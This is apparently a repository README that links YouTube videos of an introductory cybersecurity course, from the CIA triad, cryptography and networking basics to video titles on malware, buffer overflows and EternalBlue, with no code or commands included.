| [![Understanding CIA Triad (Confidentiality, Integrity, Availability)](https://img.youtube.com/vi/J-c3SydXA4A/hqdefault.jpg)](https://youtu.be/J-c3SydXA4A?si=_NCr9wewAgnTi11V) | [![Common Security Standards](https://img.youtube.com/vi/yIdjDN9L1go/hqdefault.jpg)](https://youtu.be/yIdjDN9L1go?si=qzIFc8jzcX-KTiuw) |

| **Different Teams** | **Types of Testing** |
|------------------------------------------------------------------------|---------------------------------------------|
| [![Different Teams](https://img.youtube.com/vi/H513r646VOQ/hqdefault.jpg)](https://youtu.be/H513r646VOQ?si=73jkk-UZMRFDiHmm) | [![Types of Testing](https://img.youtube.com/vi/IEi6zvTKHdU/hqdefault.jpg)](https://youtu.be/IEi6zvTKHdU?si=dsn3GECvRXIrrk4T) |

| **Five Phase of Hacking** | **Common Terms** |
|----------------------------------|---------------------------------------|
| [![Five Phase of Hacking](https://img.youtube.com/vi/BoRytkpn4_8/hqdefault.jpg)](https://youtu.be/BoRytkpn4_8?si=GPoNI_byflIQk4L7) | [![Common Terms](https://img.youtube.com/vi/VmBym5XxC-Q/hqdefault.jpg)](https://youtu.be/VmBym5XxC-Q?si=9SdMKg0xrdCwaKZT) |

**📺 Cryptography**

| 🎥 **Encoding - Decoding** | 🎥 **Encryption - Decryption** |
|---------------|---------------|
| [![Encoding - Decoding](https://img.youtube.com/vi/U6C5O7JZ9YA/hqdefault.jpg)](https://youtu.be/U6C5O7JZ9YA?si=qZ6to3ugyxW05UWT) | [![Encryption - Decryption](https://img.youtube.com/vi/7xqy_do8kIs/hqdefault.jpg)](https://youtu.be/7xqy_do8kIs?si=TBeTAJVsVoDTM6yA) |

| 🎥 **Hashing** | 🎥 **Digital Signatures and Certificates** |
|---------------|---------------|
| [![Hashing](https://img.youtube.com/vi/oAoPLtwB9Tg/hqdefault.jpg)](https://youtu.be/oAoPLtwB9Tg?si=nlmh2qCN322DvSuA) | [![Digital Signatures and Certificates](https://img.youtube.com/vi/mMVGSSO1-d0/hqdefault.jpg)](https://youtu.be/mMVGSSO1-d0?si=lKYEEDUnVR-d24W5) |

**📺 Lab Setup + Network and OS Fundamentals**

| **Windows Installation in VMWare Pro** | **Kali Linux Installation in VMWare Pro** |
|------------------------------------------|---------------------------------------------|
| [![Windows Installation in VMWare Pro](https://img.youtube.com/vi/QowgD_y3mD0/hqdefault.jpg)](https://youtu.be/QowgD_y3mD0?si=y4qd-9O3yAIRwBda) | [![Kali Linux Installation in VMWare Pro](https://img.youtube.com/vi/5rENNOB3FpI/hqdefault.jpg)](https://youtu.be/5rENNOB3FpI?si=Sj3dYYeMVhyLp8Fi) |

| **Linux Introduction Part 1** | **Linux Introduction Part 2** |
|--------------------------------|----------------------------------|
| [![Linux Introduction Part 1](https://img.youtube.com/vi/5P3UU3nhJxc/hqdefault.jpg)](https://youtu.be/5P3UU3nhJxc?si=aE164vrMTTcBEole) | [![Linux Introduction Part 2](https://img.youtube.com/vi/dhrdgoysSgI/hqdefault.jpg)](https://youtu.be/dhrdgoysSgI?si=WDIV-lujQ9CnbkkR) |

| **Introduction to Network and Topology** | **Intra Network Packet Transmission** |
|--------------------------------|------------------------------------------|
| [![Introduction to Network and Topology](https://img.youtube.com/vi/csh2IR8Iklc/hqdefault.jpg)](https://youtu.be/csh2IR8Iklc?si=UqI3i-upowFIgyKk) | [![Intra Network Packet Transmission](https://img.youtube.com/vi/OzuvqUnsbrs/hqdefault.jpg)](https://youtu.be/OzuvqUnsbrs?si=HluUIi7v2C0BZMB2) |

| **Inter Network Packet Transmission** | **IP Address Structure and their Classification** |
|-------------------------------------------|-------------------------------|
| [![Inter Network Packet Transmission](https://img.youtube.com/vi/dOQnmfCyCFE/hqdefault.jpg)](https://youtu.be/dOQnmfCyCFE?si=f3H9DewLA3TdJwck) | [![IP Address Structure and their Classification](https://img.youtube.com/vi/dBVA9EKBro8/hqdefault.jpg)](https://youtu.be/dBVA9EKBro8?si=ZyrcvyNwywG3uzfr) |

| **Public and Private IP Allocation** | **Subnetting & Supernetting** |
|--------------------------------------------|--------------------------------------------|
| [![Public and Private IP Allocation](https://img.youtube.com/vi/J7YJ34cy91c/hqdefault.jpg)](https://youtu.be/J7YJ34cy91c?si=-ZL2ALCta0ogv6sk) | [![Subnetting & Supernetting](https://img.youtube.com/vi/0o1w36LkDUg/hqdefault.jpg)](https://youtu.be/0o1w36LkDUg?si=Nb2uFJ-FKNJiBilt) |

**📺 Basic Malware and System Exploitation Techniques**

| **Windows Lock Screen Bypass** | **Malware Part 1** |
|--------------------------------|------------------------------|
| [![Windows Lock Screen Bypass](https://img.youtube.com/vi/f-yPOVM5OFM/hqdefault.jpg)](https://youtu.be/f-yPOVM5OFM?si=ZbGYJ-yJa6vTbgLP) | [![Malware Part 1](https://img.youtube.com/vi/xf5mxbltx1Y/hqdefault.jpg)](https://youtu.be/xf5mxbltx1Y?si=Lj9uuTTuxBTpdu5i) |

| **Malware Part 2** | **Malware Part 3** |
|-----------------------------|-----------------------------|
| [![Malware Part 2](https://img.youtube.com/vi/kGUBXYpPhy4/hqdefault.jpg)](https://youtu.be/kGUBXYpPhy4?si=1SFMti3mKdWG93bo) | [![Malware Part 3](https://img.youtube.com/vi/ykD4t00Y_Uw/hqdefault.jpg)](https://youtu.be/ykD4t00Y_Uw?si=WuQEuDqZR9gIvD49) |

| **Malware Part 4** | **Network Connection and Traffic** |
|-----------------------------|------------------------------------|
| [![Malware Part 4](https://img.youtube.com/vi/qCK8QmbQ3F4/hqdefault.jpg)](https://youtu.be/qCK8QmbQ3F4?si=PnKUF57QjSa3a16M) | [![Network Connection and Traffic](https://img.youtube.com/vi/8cxAw2ZrGtE/hqdefault.jpg)](https://youtu.be/8cxAw2ZrGtE?si=z43F7ANfXoIhhbKR) |

| **Memory Stack Introduction Part 1** | **Memory Stack Introduction Part 2** |
|-------------------------------------|-------------------------------------|
| [![Memory Stack Introduction Part 1](https://img.youtube.com/vi/fQWatTI9G4E/hqdefault.jpg)](https://youtu.be/fQWatTI9G4E?si=bCc7ynYva2KFM1Qv) | [![Memory Stack Introduction Part 2](https://img.youtube.com/vi/uSd2dtzGN5s/hqdefault.jpg)](https://youtu.be/uSd2dtzGN5s?si=E7BVgymfVb06A7sy) |

| **Memory Corruption and Buffer Overflow** | **Eternal Blue or MS-17-010 or CVE-2017-0144** |
|------------------------------------------|------------------------------------------------|
| [![Memory Corruption and Buffer Overflow](https://img.youtube.com/vi/LNqpE_6DfBU/hqdefault.jpg)](https://youtu.be/LNqpE_6DfBU?si=PYgbzLXx3gZ5rtp9) | [![Eternal Blue or MS-17-010 or CVE-2017-0144](https://img.youtube.com/vi/1A23SXBWDqs/hqdefault.jpg)](https://youtu.be/1A23SXBWDqs?si=qSoY2SwZUQcSTc2x) |

--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
theme: jekyll-theme-hacker